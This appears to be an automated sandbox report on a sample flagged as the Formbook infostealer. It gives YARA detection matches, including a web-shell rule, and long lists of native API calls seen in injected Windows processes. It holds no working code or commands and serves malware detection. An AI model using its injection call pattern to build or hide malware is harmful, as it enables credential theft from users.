          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Iifpj4i2kC.exe PID: 6924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: csc.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: wlanext.exe PID: 6432, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A35B NtCreateFile,5_2_0041A35B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A3B2 NtCreateFile,5_2_0041A3B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A40A NtReadFile,5_2_0041A40A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041A48B NtClose,5_2_0041A48B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_05602D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602D10 NtMapViewOfSection,LdrInitializeThunk,5_2_05602D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05602DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602DD0 NtDelayExecution,LdrInitializeThunk,5_2_05602DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05602C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_05602CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602F30 NtCreateSection,LdrInitializeThunk,5_2_05602F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602FE0 NtCreateFile,LdrInitializeThunk,5_2_05602FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602FB0 NtResumeThread,LdrInitializeThunk,5_2_05602FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_05602F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_05602EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_05602E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602B60 NtClose,LdrInitializeThunk,5_2_05602B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05602BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602AD0 NtReadFile,LdrInitializeThunk,5_2_05602AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056035C0 NtCreateMutant,5_2_056035C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05604650 NtSuspendThread,5_2_05604650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05603010 NtOpenDirectoryObject,5_2_05603010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05603090 NtSetValueKey,5_2_05603090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05604340 NtSetContextThread,5_2_05604340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05603D70 NtOpenThread,5_2_05603D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602D00 NtSetInformationFile,5_2_05602D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05603D10 NtOpenProcessToken,5_2_05603D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602DB0 NtEnumerateKey,5_2_05602DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602C60 NtCreateKey,5_2_05602C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602C00 NtQueryInformationProcess,5_2_05602C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602CF0 NtOpenProcess,5_2_05602CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602CC0 NtQueryVirtualMemory,5_2_05602CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602F60 NtCreateProcessEx,5_2_05602F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602FA0 NtQuerySection,5_2_05602FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602E30 NtWriteVirtualMemory,5_2_05602E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602EE0 NtQueueApcThread,5_2_05602EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056039B0 NtGetContextThread,5_2_056039B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602BE0 NtQueryValueKey,5_2_05602BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602BA0 NtEnumerateValueKey,5_2_05602BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602B80 NtQueryInformationFile,5_2_05602B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602AF0 NtWriteFile,5_2_05602AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602AB0 NtWaitForSingleObject,5_2_05602AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,5_2_0510A036
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510A042 NtQueryInformationProcess,5_2_0510A042
          Source: C:\Windows\explorer.exeCode function: 6_2_0E236232 NtCreateFile,6_2_0E236232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E237E12 NtProtectVirtualMemory,6_2_0E237E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0E237E0A NtProtectVirtualMemory,6_2_0E237E0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FDF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,7_2_00FDF267
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772B60 NtClose,LdrInitializeThunk,7_2_03772B60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03772BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03772BE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772AD0 NtReadFile,LdrInitializeThunk,7_2_03772AD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772F30 NtCreateSection,LdrInitializeThunk,7_2_03772F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772FE0 NtCreateFile,LdrInitializeThunk,7_2_03772FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03772EA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03772D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03772DF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772DD0 NtDelayExecution,LdrInitializeThunk,7_2_03772DD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03772C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772C60 NtCreateKey,LdrInitializeThunk,7_2_03772C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03772CA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037735C0 NtCreateMutant,LdrInitializeThunk,7_2_037735C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03774340 NtSetContextThread,7_2_03774340
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03774650 NtSuspendThread,7_2_03774650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772BA0 NtEnumerateValueKey,7_2_03772BA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772B80 NtQueryInformationFile,7_2_03772B80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772AF0 NtWriteFile,7_2_03772AF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772AB0 NtWaitForSingleObject,7_2_03772AB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772F60 NtCreateProcessEx,7_2_03772F60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772FB0 NtResumeThread,7_2_03772FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772FA0 NtQuerySection,7_2_03772FA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772F90 NtProtectVirtualMemory,7_2_03772F90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772E30 NtWriteVirtualMemory,7_2_03772E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772EE0 NtQueueApcThread,7_2_03772EE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772E80 NtReadVirtualMemory,7_2_03772E80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772D30 NtUnmapViewOfSection,7_2_03772D30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772D00 NtSetInformationFile,7_2_03772D00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772DB0 NtEnumerateKey,7_2_03772DB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772C00 NtQueryInformationProcess,7_2_03772C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772CF0 NtOpenProcess,7_2_03772CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03772CC0 NtQueryVirtualMemory,7_2_03772CC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03773010 NtOpenDirectoryObject,7_2_03773010
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03773090 NtSetValueKey,7_2_03773090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037739B0 NtGetContextThread,7_2_037739B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03773D70 NtOpenThread,7_2_03773D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03773D10 NtOpenProcessToken,7_2_03773D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA360 NtCreateFile,7_2_00EEA360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA490 NtClose,7_2_00EEA490
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA410 NtReadFile,7_2_00EEA410
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA540 NtAllocateVirtualMemory,7_2_00EEA540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA3B2 NtCreateFile,7_2_00EEA3B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA35B NtCreateFile,7_2_00EEA35B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA48B NtClose,7_2_00EEA48B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEA40A NtReadFile,7_2_00EEA40A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A59BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_03A59BAF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A5A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_03A5A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A59BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_03A59BB2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A5A042 NtQueryInformationProcess,7_2_03A5A042
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FDF267: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,7_2_00FDF267
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6DFD00_2_00007FF67FA6DFD0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA70C500_2_00007FF67FA70C50
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA688300_2_00007FF67FA68830
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA723700_2_00007FF67FA72370
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA593400_2_00007FF67FA59340
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6D16A0_2_00007FF67FA6D16A
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA580D00_2_00007FF67FA580D0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FB100E00_2_00007FF67FB100E0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA5EFE00_2_00007FF67FA5EFE0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA73F600_2_00007FF67FA73F60
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7BEA00_2_00007FF67FA7BEA0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6FDD00_2_00007FF67FA6FDD0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA64CD90_2_00007FF67FA64CD9
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA62D300_2_00007FF67FA62D30
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA77C790_2_00007FF67FA77C79
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA75C200_2_00007FF67FA75C20
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6FB400_2_00007FF67FA6FB40
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FB07BA00_2_00007FF67FB07BA0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7BBA00_2_00007FF67FA7BBA0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FB02AC00_2_00007FF67FB02AC0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA46A500_2_00007FF67FA46A50
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA69A500_2_00007FF67FA69A50
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA56A500_2_00007FF67FA56A50
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA84A400_2_00007FF67FA84A40
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA799C30_2_00007FF67FA799C3
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA51A000_2_00007FF67FA51A00
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7F9600_2_00007FF67FA7F960
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA788D90_2_00007FF67FA788D9
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FAA19100_2_00007FF67FAA1910
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6A8500_2_00007FF67FA6A850
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA4A8B00_2_00007FF67FA4A8B0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA5E8A00_2_00007FF67FA5E8A0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA667F00_2_00007FF67FA667F0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7C8000_2_00007FF67FA7C800
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA527500_2_00007FF67FA52750
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7A7B00_2_00007FF67FA7A7B0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA636400_2_00007FF67FA63640
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6B6B00_2_00007FF67FA6B6B0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA735C00_2_00007FF67FA735C0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA666100_2_00007FF67FA66610
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7E5400_2_00007FF67FA7E540
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7B4F00_2_00007FF67FA7B4F0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA644D00_2_00007FF67FA644D0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA615200_2_00007FF67FA61520
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA714700_2_00007FF67FA71470
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA504700_2_00007FF67FA50470
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FAF34800_2_00007FF67FAF3480
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA483C40_2_00007FF67FA483C4
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA494300_2_00007FF67FA49430
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA6A4200_2_00007FF67FA6A420
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA603600_2_00007FF67FA60360
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA743900_2_00007FF67FA74390
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA752E00_2_00007FF67FA752E0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA792CE0_2_00007FF67FA792CE
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7D3200_2_00007FF67FA7D320
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FB1E2400_2_00007FF67FB1E240
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7F2800_2_00007FF67FA7F280
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA482200_2_00007FF67FA48220
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA682000_2_00007FF67FA68200
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA812000_2_00007FF67FA81200
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA652000_2_00007FF67FA65200
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA791B00_2_00007FF67FA791B0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA661900_2_00007FF67FA66190
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA7B1800_2_00007FF67FA7B180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041D8C45_2_0041D8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041EB715_2_0041EB71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0041DE5E5_2_0041DE5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056875715_2_05687571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D05355_2_055D0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566D5B05_2_0566D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056905915_2_05690591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056824465_2_05682446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C14605_2_055C1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568F43F5_2_0568F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567E4F65_2_0567E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F47505_2_055F4750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D07705_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CC7C05_2_055CC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568F7B05_2_0568F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056816CC5_2_056816CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EC6E05_2_055EC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569B16B5_2_0569B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0560516C5_2_0560516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF1725_2_055BF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056581585_2_05658158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C01005_2_055C0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566A1185_2_0566A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056881CC5_2_056881CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056901AA5_2_056901AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DB1B05_2_055DB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056870E95_2_056870E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568F0E05_2_0568F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D70C05_2_055D70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F0CC5_2_0567F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BD34C5_2_055BD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568A3525_2_0568A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568132D5_2_0568132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056903E65_2_056903E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE3F05_2_055DE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0561739A5_2_0561739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056702745_2_05670274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056712ED5_2_056712ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EB2C05_2_055EB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056502C05_2_056502C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D52A05_2_055D52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05687D735_2_05687D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D3D405_2_055D3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05681D5A5_2_05681D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DAD005_2_055DAD00
